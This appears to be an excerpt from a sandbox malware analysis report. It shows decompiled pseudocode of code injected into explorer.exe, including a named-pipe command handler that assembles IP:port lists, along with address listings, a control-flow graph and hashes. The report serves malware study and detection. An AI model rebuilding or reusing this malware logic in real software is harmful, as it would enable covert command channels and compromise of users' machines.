					_v600 = _t63;
					if(_t63 != 0) {
						_push(0);
						_push(_t114);
						_push(0x7bc9a0);
						_t115 = E007A9A5A(_t63);
						_t186 = _t185 + 0x10;
						_t65 =  *0x7bf81c; // 0x7d0000
						__eflags =  *((intOrPtr*)(_t65 + 0x214)) - 3;
						if( *((intOrPtr*)(_t65 + 0x214)) != 3) {
							L12:
							__eflags = _v596;
							if(__eflags != 0) {
								_t66 = E007A98BD(_v600);
								_t130 = _t115;
								 *0x7bf8d8 = _t66;
								 *0x7bf8d0 = E007A98BD(_t130);
								L17:
								_push(_t130);
								_t70 = E007AA633( &_v532, _t173, _t192, _v592,  &_v584,  &_v600); // executed
								_t174 = _t70;
								_t187 = _t186 + 0x10;
								__eflags = _t174;
								if(_t174 == 0) {
									goto L41;
								}
								_push(0x7bc9f2);
								_t163 = 0xe;
								E007AAAA3(_t163, _t192); // executed
								E007AAADC(_t174, _t192, _t115); // executed
								_t180 = _a4;
								_push( *_t180);
								E007AAA7E(0xb); // executed
								_t165 =  *(_t180 + 0x10);
								__eflags =  *(_t180 + 0x10);
								if( *(_t180 + 0x10) != 0) {
									E007AB025(_t165, _t192);
								}
								_t166 =  *(_t180 + 0xc);
								__eflags = _t166;
								if(_t166 != 0) {
									E007AB025(_t166, _t192); // executed
								}
								_t76 = E007AA065(0);
								_push(_t166);
								_t167 = 2;
								_t77 = E007AAA50(); // executed
								__eflags = _v596;
								_t142 = _t76;
								if(_v596 == 0) {
									_t142 =  *0x7bf81c; // 0x7d0000
									__eflags =  *((intOrPtr*)(_t142 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t78 = E007B0D7E(_t77, _t115, _t167, _t192, 0, _t115, 0);
										_t187 =  &(_t187[3]);
										goto L26;
									}
									_t142 = _t142 + 0x228;
									goto L25;
								} else {
									_t79 =  *0x7bf81c; // 0x7d0000
									__eflags =  *((intOrPtr*)(_t79 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t79 + 0x1898) & 0x00000082;
										if(( *(_t79 + 0x1898) & 0x00000082) != 0) {
											_t169 = 0x64;
											E007AF0DE(_t169);
										}
										E007A584B( &_v580, _t192);
										_t176 = _a8;
										_t143 = _t142;
										__eflags = _t176;
										if(_t176 != 0) {
											_t82 =  *0x7bf81c; // 0x7d0000
											__eflags =  *((intOrPtr*)(_t82 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t82 + 0xa0)) != 1) {
												lstrcpyW(_t176, _t115);
											} else {
												_t84 = E007A109A(_t143, 0x49f);
												_v596 = _t84;
												lstrcpyW(_t176, _t84);
												E007A8BAF( &_v596);
												 *_t187 = 0x7bc9b0;
												lstrcatW(_t176, ??);
												lstrcatW(_t176, _t115);
												lstrcatW(_t176, 0x7bc9b0);
											}
										}
										_t81 = _a12;
										__eflags = _t81;
										if(_t81 != 0) {
											 *_t81 = _v592;
										}
										_t178 = 0;
										__eflags = 0;
										goto L41;
									}
									_t40 = _t79 + 0x228; // 0x7d0228
									_t142 = _t40;
									L25:
									_t78 = E007A5AC0(_t142, _t115, __eflags);
									L26:
									__eflags = _t78;
									if(_t78 >= 0) {
										_t79 =  *0x7bf81c; // 0x7d0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t178);
									goto L41;
								}
							}
							_t94 = E007AD11F(_v592, __eflags);
							_v600 = _t94;
							_t95 =  *0x7bf818; // 0xeaf6c8
							_t96 =  *((intOrPtr*)(_t95 + 0xdc))(_t94, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t96 - _t178;
							if(_t96 != _t178) {
								_t97 =  *0x7bf818; // 0xeaf6c8
								 *((intOrPtr*)(_t97 + 0x30))();
								E007A8BF4( &_v636, _t178);
								_t130 = _t96;
								goto L17;
							}
							E007A8BF4( &_v632, _t178);
							_t72 = 1;
							goto L42;
						}
						_t104 =  *(_t65 + 0x1898);
						__eflags = _t104 & 0x00000004;
						if((_t104 & 0x00000004) == 0) {
							__eflags = _t104;
							if(_t104 != 0) {
								goto L12;
							}
							L11:
							E007AF1F6(_v600, _t161);
							goto L12;
						}
						E007AF1B6(_v600,  &_v580);
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t107 = E007A3097( &_v532, _t178, 0x105); // executed
					_t190 = _t107;
					if(_t107 == 0) {
						L41:
						E007A5F6F( &_v588);
						_t72 = _t178;
						L42:
						return _t72;
					}
					goto L4;
				}
			}



























































                                                                                                                                                                        0x007a50b3
                                                                                                                                                                        0x007a50c0
                                                                                                                                                                        0x007a50cb
                                                                                                                                                                        0x007a50d0
                                                                                                                                                                        0x007a50d2
                                                                                                                                                                        0x007a50d5
                                                                                                                                                                        0x007a50da
                                                                                                                                                                        0x007a50df
                                                                                                                                                                        0x007a50e2
                                                                                                                                                                        0x007a50ec
                                                                                                                                                                        0x007a50ee
                                                                                                                                                                        0x007a50fb
                                                                                                                                                                        0x007a5104
                                                                                                                                                                        0x007a5104
                                                                                                                                                                        0x007a5111
                                                                                                                                                                        0x007a512c
                                                                                                                                                                        0x007a512e
                                                                                                                                                                        0x007a5133
                                                                                                                                                                        0x007a5138
                                                                                                                                                                        0x007a513e
                                                                                                                                                                        0x007a514d
                                                                                                                                                                        0x007a516c
                                                                                                                                                                        0x007a516e
                                                                                                                                                                        0x007a5173
                                                                                                                                                                        0x007a5174
                                                                                                                                                                        0x007a517a
                                                                                                                                                                        0x007a517f
                                                                                                                                                                        0x007a5186
                                                                                                                                                                        0x007a5190
                                                                                                                                                                        0x007a5192
                                                                                                                                                                        0x007a5193
                                                                                                                                                                        0x007a519e
                                                                                                                                                                        0x007a51a0
                                                                                                                                                                        0x007a51a3
                                                                                                                                                                        0x007a51a8
                                                                                                                                                                        0x007a51af
                                                                                                                                                                        0x007a51d3
                                                                                                                                                                        0x007a51d3
                                                                                                                                                                        0x007a51d8
                                                                                                                                                                        0x007a523f
                                                                                                                                                                        0x007a5244
                                                                                                                                                                        0x007a5246
                                                                                                                                                                        0x007a5250
                                                                                                                                                                        0x007a5255
                                                                                                                                                                        0x007a5255
                                                                                                                                                                        0x007a526a
                                                                                                                                                                        0x007a526f
                                                                                                                                                                        0x007a5271
                                                                                                                                                                        0x007a5274
                                                                                                                                                                        0x007a5276
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a527c
                                                                                                                                                                        0x007a5283
                                                                                                                                                                        0x007a5286
                                                                                                                                                                        0x007a528f
                                                                                                                                                                        0x007a5294
                                                                                                                                                                        0x007a529a
                                                                                                                                                                        0x007a529f
                                                                                                                                                                        0x007a52a4
                                                                                                                                                                        0x007a52a8
                                                                                                                                                                        0x007a52aa
                                                                                                                                                                        0x007a52ae
                                                                                                                                                                        0x007a52ae
                                                                                                                                                                        0x007a52b3
                                                                                                                                                                        0x007a52b6
                                                                                                                                                                        0x007a52b8
                                                                                                                                                                        0x007a52bc
                                                                                                                                                                        0x007a52bc
                                                                                                                                                                        0x007a52c3
                                                                                                                                                                        0x007a52c8
                                                                                                                                                                        0x007a52cc
                                                                                                                                                                        0x007a52cf
                                                                                                                                                                        0x007a52d4
                                                                                                                                                                        0x007a52da
                                                                                                                                                                        0x007a52db
                                                                                                                                                                        0x007a5303
                                                                                                                                                                        0x007a5309
                                                                                                                                                                        0x007a5310
                                                                                                                                                                        0x007a531f
                                                                                                                                                                        0x007a5324
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5324
                                                                                                                                                                        0x007a5312
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a52dd
                                                                                                                                                                        0x007a52dd
                                                                                                                                                                        0x007a52e2
                                                                                                                                                                        0x007a52e9
                                                                                                                                                                        0x007a532e
                                                                                                                                                                        0x007a532e
                                                                                                                                                                        0x007a5335
                                                                                                                                                                        0x007a5339
                                                                                                                                                                        0x007a533a
                                                                                                                                                                        0x007a533a
                                                                                                                                                                        0x007a5344
                                                                                                                                                                        0x007a5349
                                                                                                                                                                        0x007a534c
                                                                                                                                                                        0x007a534d
                                                                                                                                                                        0x007a534f
                                                                                                                                                                        0x007a5351
                                                                                                                                                                        0x007a5356
                                                                                                                                                                        0x007a535d
                                                                                                                                                                        0x007a53a0
                                                                                                                                                                        0x007a535f
                                                                                                                                                                        0x007a5364
                                                                                                                                                                        0x007a536c
                                                                                                                                                                        0x007a5370
                                                                                                                                                                        0x007a537b
                                                                                                                                                                        0x007a5386
                                                                                                                                                                        0x007a538e
                                                                                                                                                                        0x007a5392
                                                                                                                                                                        0x007a539a
                                                                                                                                                                        0x007a539a
                                                                                                                                                                        0x007a535d
                                                                                                                                                                        0x007a53a6
                                                                                                                                                                        0x007a53a9
                                                                                                                                                                        0x007a53ab
                                                                                                                                                                        0x007a53b1
                                                                                                                                                                        0x007a53b1
                                                                                                                                                                        0x007a53b3
                                                                                                                                                                        0x007a53b3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a53b3
                                                                                                                                                                        0x007a52eb
                                                                                                                                                                        0x007a52eb
                                                                                                                                                                        0x007a52f1
                                                                                                                                                                        0x007a52f3
                                                                                                                                                                        0x007a52f8
                                                                                                                                                                        0x007a52f8
                                                                                                                                                                        0x007a52fa
                                                                                                                                                                        0x007a5329
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5329
                                                                                                                                                                        0x007a52fc
                                                                                                                                                                        0x007a518a
                                                                                                                                                                        0x007a518a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a518a
                                                                                                                                                                        0x007a52db
                                                                                                                                                                        0x007a51de
                                                                                                                                                                        0x007a51ec
                                                                                                                                                                        0x007a51ff
                                                                                                                                                                        0x007a5204
                                                                                                                                                                        0x007a520a
                                                                                                                                                                        0x007a520c
                                                                                                                                                                        0x007a5224
                                                                                                                                                                        0x007a5229
                                                                                                                                                                        0x007a5232
                                                                                                                                                                        0x007a5238
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5238
                                                                                                                                                                        0x007a5214
                                                                                                                                                                        0x007a521d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a521d
                                                                                                                                                                        0x007a51b1
                                                                                                                                                                        0x007a51b7
                                                                                                                                                                        0x007a51b9
                                                                                                                                                                        0x007a51c6
                                                                                                                                                                        0x007a51c8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a51ca
                                                                                                                                                                        0x007a51ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a51ce
                                                                                                                                                                        0x007a51bf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a51bf
                                                                                                                                                                        0x007a5188
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5113
                                                                                                                                                                        0x007a511e
                                                                                                                                                                        0x007a5124
                                                                                                                                                                        0x007a5126
                                                                                                                                                                        0x007a53b5
                                                                                                                                                                        0x007a53b9
                                                                                                                                                                        0x007a53be
                                                                                                                                                                        0x007a53c0
                                                                                                                                                                        0x007a53c6
                                                                                                                                                                        0x007a53c6
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a5126

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000021.00000002.544021293.00000000007A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_33_2_7a0000_explorer.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcat$lstrcpy$memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1985475764-0
                                                                                                                                                                        • Opcode ID: adc93e6a0609498401a5b07bf38559d9116ce493041a0aa1f478adfd07696d54
                                                                                                                                                                        • Instruction ID: cda5df497af8a126bbe589976945a470aa2e576995381f15b66eb5876f9a15f8
                                                                                                                                                                        • Opcode Fuzzy Hash: adc93e6a0609498401a5b07bf38559d9116ce493041a0aa1f478adfd07696d54
                                                                                                                                                                        • Instruction Fuzzy Hash: DB81ED71604700ABD714EB20EC8AF7E73E9ABC6710F14872DF5558B2D1EBBC99048B82
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 007A377F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 306pipeCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 104 7a377f-7a3794 105 7a3798-7a37b0 ConnectNamedPipe 104->105 106 7a37b2-7a37bd GetLastError 105->106 107 7a37c3-7a37e7 105->107 106->107 108 7a3b17-7a3b1f 106->108 110 7a37ed-7a37f2 107->110 111 7a3af7 GetLastError 107->111 110->111 113 7a37f8-7a3804 110->113 112 7a3afd-7a3b11 DisconnectNamedPipe 111->112 112->105 112->108 114 7a380a 113->114 115 7a3976-7a3979 113->115 118 7a3810-7a3813 114->118 119 7a3967-7a3971 call 7b0962 114->119 116 7a3ae8-7a3af2 call 7b0962 115->116 117 7a397f-7a3983 115->117 116->111 122 7a39c4-7a39d7 call 7a171a 117->122 123 7a3985-7a3988 117->123 124 7a387e-7a3899 call 7a9b33 118->124 125 7a3815-7a3818 118->125 119->115 140 7a3ad8-7a3ae2 122->140 141 7a39dd-7a39f7 call 7a8bde 122->141 123->112 130 7a398e-7a39a5 call 7a171a 123->130 142 7a389f-7a38a6 124->142 143 7a3936-7a3958 call 7a9edb 124->143 131 7a381a-7a381e 125->131 132 7a3860-7a3879 call 7ad1a6 call 7a5ec3 125->132 152 7a39a7-7a39b3 call 7a8bf4 130->152 153 7a39b4-7a39bb 130->153 133 7a3842-7a384f call 7b0940 131->133 134 7a3820-7a3823 131->134 132->112 160 7a3851-7a3855 133->160 161 7a3857-7a385b 133->161 134->112 139 7a3829-7a3838 call 7b0940 134->139 165 7a383a-7a383d 139->165 140->116 166 7a39fd-7a3a01 141->166 167 7a3ab2-7a3ac7 call 7ad1a6 141->167 149 7a38a8-7a38bf call 7a8bde 142->149 150 7a391f-7a3932 call 7a9f6f call 7a1dd3 142->150 170 7a395a-7a3962 call 7ad1a6 143->170 149->143 174 7a38c1-7a38c6 149->174 150->143 152->153 153->122 160->165 161->170 165->170 172 7a3a90-7a3ab0 call 7aa43d call 7ad1a6 call 7a8bf4 166->172 173 7a3a07-7a3a0e 166->173 190 7a3ac8-7a3ad3 call 7a8bf4 167->190 170->112 172->190 179 7a3a12-7a3a14 173->179 180 7a38c8 174->180 181 7a38f5-7a391d call 7a9f6f call 7a1dd3 call 7a9c2c 174->181 186 7a3a2e-7a3a36 179->186 187 7a3a16-7a3a1b 179->187 188 7a38cc-7a38ef call 7aa43d call 7a9880 180->188 181->143 196 7a3a38-7a3a81 call 7aa43d * 2 call 7a9e12 186->196 197 7a3a84-7a3a8e 186->197 187->186 194 7a3a1d-7a3a28 call 7aa43d 187->194 215 7a38f1 188->215 190->140 194->186 196->197 197->172 197->179 215->181
                                                                                                                                                                        C-Code - Quality: 65%
                                                                                                                                                                        			E007A377F(void* __fp0) {
				struct _OVERLAPPED* _v144;
				char _v152;
				char _v156;
				char _v160;
				intOrPtr _v164;
				char _v168;
				struct _OVERLAPPED* _v172;
				signed int _v176;
				signed int _v180;
				struct _OVERLAPPED* _v184;
				signed int _v188;
				char _v192;
				struct _OVERLAPPED* _v196;
				intOrPtr _t75;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int* _t104;
				signed int _t113;
				void* _t118;
				intOrPtr _t124;
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				void* _t133;
				void* _t137;
				signed int _t146;
				signed int _t148;
				signed short* _t149;
				signed int _t159;
				intOrPtr* _t183;
				void* _t187;
				void* _t188;
				void* _t189;
				signed short* _t192;
				void* _t196;
				signed int _t199;
				signed int _t200;
				signed int _t203;
				signed int _t204;
				char _t205;
				signed int _t206;
				void* _t208;
				void* _t214;
				void* _t221;

				_t221 = __fp0;
				_t208 = (_t206 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_v152 = 0;
					if(ConnectNamedPipe( *0x7bf804, 0) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v152);
					_t75 =  *0x7bf818; // 0xeaf6c8
					_push(0x80000);
					_push( *0x7bf8bc);
					_push( *0x7bf804);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v172 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t149 =  *0x7bf8bc; // 0x4fd4020
						_t80 =  *_t149 & 0x0000ffff;
						_t214 = _t80 - 8;
						if(_t214 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E007B0962( &_v192);
								L12:
								_t84 =  &_v192;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t187);
								E007AD1A6(_t187);
								L32:
								L56:
								DisconnectNamedPipe( *0x7bf804);
								_push(0);
								_pop(0);
								if(_v164 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v196 = 0;
								_t88 = E007A171A( &_v196, _t221);
								_v180 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v184 = 0;
									_push( &_v184);
									L19:
									_push(0xa);
									goto L31;
								}
								_t146 = _v196;
								_v176 = _t146 * 0x16;
								_t203 = E007A8BDE(_t146 * 0x16);
								_v184 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v184;
									 *_t64 = _v184 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v184);
									_t188 = 0xa;
									E007AD1A6(_t188);
									L52:
									E007A8BF4( &_v180, _t146);
									goto L32;
								}
								_t199 = 0;
								__eflags = _t146;
								if(_t146 == 0) {
									L50:
									_push(E007AA43D(_t203));
									_push(_t203);
									_t189 = 5;
									E007AD1A6(_t189);
									E007A8BF4( &_v184, 0xffffffff);
									_t208 = _t208 + 0x10;
									goto L52;
								}
								_t159 = _v180 + 4;
								__eflags = _t159;
								_v196 = _t159;
								do {
									__eflags = _t199;
									if(_t199 != 0) {
										__eflags = _t199 - _t146 - 1;
										if(_t199 < _t146 - 1) {
											_t102 = E007AA43D(_t203);
											_t159 = _v196;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t159;
									_v188 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E007AA43D(_t203);
										_t104 = _v196;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										__eflags = E007AA43D(_t203) + _t203;
										E007A9E12(E007AA43D(_t203) + _t203, _v176 - _t103, "%u.%u.%u.%u:%u", _v188 & 0x000000ff);
										_t159 = _v196;
										_t208 = _t208 + 0x20;
									}
									_t199 = _t199 + 1;
									_t159 = _t159 + 0x20;
									_v196 = _t159;
									__eflags = _t199 - _t146;
								} while (_t199 < _t146);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v196 = 0;
							_t113 = E007A171A( &_v196, _t221);
							_t204 = _v196;
							_v188 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E007A8BF4( &_v188, _t204);
							}
							_v196 = _t204 * 0x16;
							_t84 =  &_v196;
							goto L13;
						}
						if(_t214 == 0) {
							_t84 = E007B0962( &_v192);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v192);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t200 = E007A9B33( &(_t149[4]), 0x20, 1,  &_v168);
							_v188 = _t200;
							__eflags = _t200;
							if(_t200 == 0) {
								L30:
								_t192 =  *0x7bf8bc; // 0x4fd4020
								E007A9EDB( &_v156,  &(_t192[4]), 0x80);
								_push(0x84);
								_push( &_v160);
								_push(2);
								goto L31;
							}
							_t205 = _v168;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E007A1DD3(E007A9F6F( *_t200, __eflags), 0, 0, 0);
								_t208 = _t208 + 0x10;
								_v160 = _t124;
								goto L30;
							}
							_v176 = _t205 - 1;
							_t127 = E007A8BDE(_t205 - 1 << 2);
							_v180 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t148 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E007A1DD3(E007A9F6F( *_t200, __eflags), _t127, _v176, 0);
								_t208 = _t208 + 0x10;
								_v160 = _t129;
								E007A9C2C( &_v168);
								goto L30;
							}
							_v196 = _t127;
							do {
								_t132 = E007A9880( *((intOrPtr*)(_t200 + _t148 * 4)), E007AA43D( *((intOrPtr*)(_t200 + _t148 * 4))));
								_t183 = _v196;
								_t148 = _t148 + 1;
								 *_t183 = _t132;
								_v196 = _t183 + 4;
								__eflags = _t148 - _t205;
							} while (__eflags < 0);
							_t127 = _v180;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t196 = 5;
							E007A5EC3(E007AD1A6(_t196));
							_v164 = 1;
							goto L56;
						}
						_t137 = _t133;
						if(_t137 == 0) {
							_t84 = E007B0940( &_v192);
							goto L16;
						}
						if(_t137 != 1) {
							goto L56;
						}
						E007B0940( &_v192);
						goto L12;
					}
				}
				return 0;
			}





















































                                                                                                                                                                        0x007a377f
                                                                                                                                                                        0x007a3785
                                                                                                                                                                        0x007a3790
                                                                                                                                                                        0x007a3794
                                                                                                                                                                        0x007a3798
                                                                                                                                                                        0x007a37a4
                                                                                                                                                                        0x007a37b0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a37c3
                                                                                                                                                                        0x007a37c8
                                                                                                                                                                        0x007a37c9
                                                                                                                                                                        0x007a37ce
                                                                                                                                                                        0x007a37d3
                                                                                                                                                                        0x007a37d9
                                                                                                                                                                        0x007a37e7
                                                                                                                                                                        0x007a3af7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a37f8
                                                                                                                                                                        0x007a37f8
                                                                                                                                                                        0x007a37fe
                                                                                                                                                                        0x007a3801
                                                                                                                                                                        0x007a3804
                                                                                                                                                                        0x007a3976
                                                                                                                                                                        0x007a3976
                                                                                                                                                                        0x007a3979
                                                                                                                                                                        0x007a3aed
                                                                                                                                                                        0x007a3833
                                                                                                                                                                        0x007a3834
                                                                                                                                                                        0x007a3838
                                                                                                                                                                        0x007a3838
                                                                                                                                                                        0x007a383a
                                                                                                                                                                        0x007a383a
                                                                                                                                                                        0x007a383b
                                                                                                                                                                        0x007a395a
                                                                                                                                                                        0x007a395a
                                                                                                                                                                        0x007a395b
                                                                                                                                                                        0x007a3960
                                                                                                                                                                        0x007a3afd
                                                                                                                                                                        0x007a3b03
                                                                                                                                                                        0x007a3b0e
                                                                                                                                                                        0x007a3b10
                                                                                                                                                                        0x007a3b11
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3b11
                                                                                                                                                                        0x007a3980
                                                                                                                                                                        0x007a3980
                                                                                                                                                                        0x007a3983
                                                                                                                                                                        0x007a39c8
                                                                                                                                                                        0x007a39cc
                                                                                                                                                                        0x007a39d1
                                                                                                                                                                        0x007a39d5
                                                                                                                                                                        0x007a39d7
                                                                                                                                                                        0x007a3ad8
                                                                                                                                                                        0x007a3ade
                                                                                                                                                                        0x007a3ae2
                                                                                                                                                                        0x007a3859
                                                                                                                                                                        0x007a3859
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3859
                                                                                                                                                                        0x007a39dd
                                                                                                                                                                        0x007a39e5
                                                                                                                                                                        0x007a39ee
                                                                                                                                                                        0x007a39f0
                                                                                                                                                                        0x007a39f5
                                                                                                                                                                        0x007a39f7
                                                                                                                                                                        0x007a3ab2
                                                                                                                                                                        0x007a3ab2
                                                                                                                                                                        0x007a3ab2
                                                                                                                                                                        0x007a3abb
                                                                                                                                                                        0x007a3abd
                                                                                                                                                                        0x007a3ac0
                                                                                                                                                                        0x007a3ac1
                                                                                                                                                                        0x007a3ac8
                                                                                                                                                                        0x007a3ace
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3ace
                                                                                                                                                                        0x007a39fd
                                                                                                                                                                        0x007a39ff
                                                                                                                                                                        0x007a3a01
                                                                                                                                                                        0x007a3a90
                                                                                                                                                                        0x007a3a97
                                                                                                                                                                        0x007a3a98
                                                                                                                                                                        0x007a3a9b
                                                                                                                                                                        0x007a3a9c
                                                                                                                                                                        0x007a3aa8
                                                                                                                                                                        0x007a3aad
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3aad
                                                                                                                                                                        0x007a3a0b
                                                                                                                                                                        0x007a3a0b
                                                                                                                                                                        0x007a3a0e
                                                                                                                                                                        0x007a3a12
                                                                                                                                                                        0x007a3a12
                                                                                                                                                                        0x007a3a14
                                                                                                                                                                        0x007a3a19
                                                                                                                                                                        0x007a3a1b
                                                                                                                                                                        0x007a3a1e
                                                                                                                                                                        0x007a3a24
                                                                                                                                                                        0x007a3a28
                                                                                                                                                                        0x007a3a28
                                                                                                                                                                        0x007a3a1b
                                                                                                                                                                        0x007a3a2e
                                                                                                                                                                        0x007a3a30
                                                                                                                                                                        0x007a3a34
                                                                                                                                                                        0x007a3a36
                                                                                                                                                                        0x007a3a39
                                                                                                                                                                        0x007a3a40
                                                                                                                                                                        0x007a3a49
                                                                                                                                                                        0x007a3a4f
                                                                                                                                                                        0x007a3a54
                                                                                                                                                                        0x007a3a5d
                                                                                                                                                                        0x007a3a75
                                                                                                                                                                        0x007a3a78
                                                                                                                                                                        0x007a3a7d
                                                                                                                                                                        0x007a3a81
                                                                                                                                                                        0x007a3a81
                                                                                                                                                                        0x007a3a84
                                                                                                                                                                        0x007a3a85
                                                                                                                                                                        0x007a3a88
                                                                                                                                                                        0x007a3a8c
                                                                                                                                                                        0x007a3a8c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3a12
                                                                                                                                                                        0x007a3985
                                                                                                                                                                        0x007a3988
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3992
                                                                                                                                                                        0x007a3996
                                                                                                                                                                        0x007a399b
                                                                                                                                                                        0x007a399f
                                                                                                                                                                        0x007a39a3
                                                                                                                                                                        0x007a39a5
                                                                                                                                                                        0x007a39ad
                                                                                                                                                                        0x007a39b3
                                                                                                                                                                        0x007a39b7
                                                                                                                                                                        0x007a39bb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a39bb
                                                                                                                                                                        0x007a380a
                                                                                                                                                                        0x007a396c
                                                                                                                                                                        0x007a384c
                                                                                                                                                                        0x007a384d
                                                                                                                                                                        0x007a384f
                                                                                                                                                                        0x007a3857
                                                                                                                                                                        0x007a3858
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3858
                                                                                                                                                                        0x007a3851
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3851
                                                                                                                                                                        0x007a3810
                                                                                                                                                                        0x007a3813
                                                                                                                                                                        0x007a388f
                                                                                                                                                                        0x007a3891
                                                                                                                                                                        0x007a3897
                                                                                                                                                                        0x007a3899
                                                                                                                                                                        0x007a3936
                                                                                                                                                                        0x007a3936
                                                                                                                                                                        0x007a3948
                                                                                                                                                                        0x007a394e
                                                                                                                                                                        0x007a3957
                                                                                                                                                                        0x007a3958
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3958
                                                                                                                                                                        0x007a389f
                                                                                                                                                                        0x007a38a3
                                                                                                                                                                        0x007a38a6
                                                                                                                                                                        0x007a392a
                                                                                                                                                                        0x007a392f
                                                                                                                                                                        0x007a3932
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3932
                                                                                                                                                                        0x007a38ab
                                                                                                                                                                        0x007a38b3
                                                                                                                                                                        0x007a38b8
                                                                                                                                                                        0x007a38bd
                                                                                                                                                                        0x007a38bf
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a38c3
                                                                                                                                                                        0x007a38c4
                                                                                                                                                                        0x007a38c6
                                                                                                                                                                        0x007a38f5
                                                                                                                                                                        0x007a3904
                                                                                                                                                                        0x007a3909
                                                                                                                                                                        0x007a390c
                                                                                                                                                                        0x007a3918
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3918
                                                                                                                                                                        0x007a38c8
                                                                                                                                                                        0x007a38cc
                                                                                                                                                                        0x007a38da
                                                                                                                                                                        0x007a38df
                                                                                                                                                                        0x007a38e3
                                                                                                                                                                        0x007a38e4
                                                                                                                                                                        0x007a38e9
                                                                                                                                                                        0x007a38ed
                                                                                                                                                                        0x007a38ed
                                                                                                                                                                        0x007a38f1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a38f1
                                                                                                                                                                        0x007a3815
                                                                                                                                                                        0x007a3818
                                                                                                                                                                        0x007a3860
                                                                                                                                                                        0x007a3861
                                                                                                                                                                        0x007a3864
                                                                                                                                                                        0x007a386c
                                                                                                                                                                        0x007a3871
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x007a3871
                                                                                                                                                                        0x007a381b
                                                                                                                                                                        0x007a381e
                                                                                                                                                                        0x007a3847
                                                                                                                                                                        0x00000000
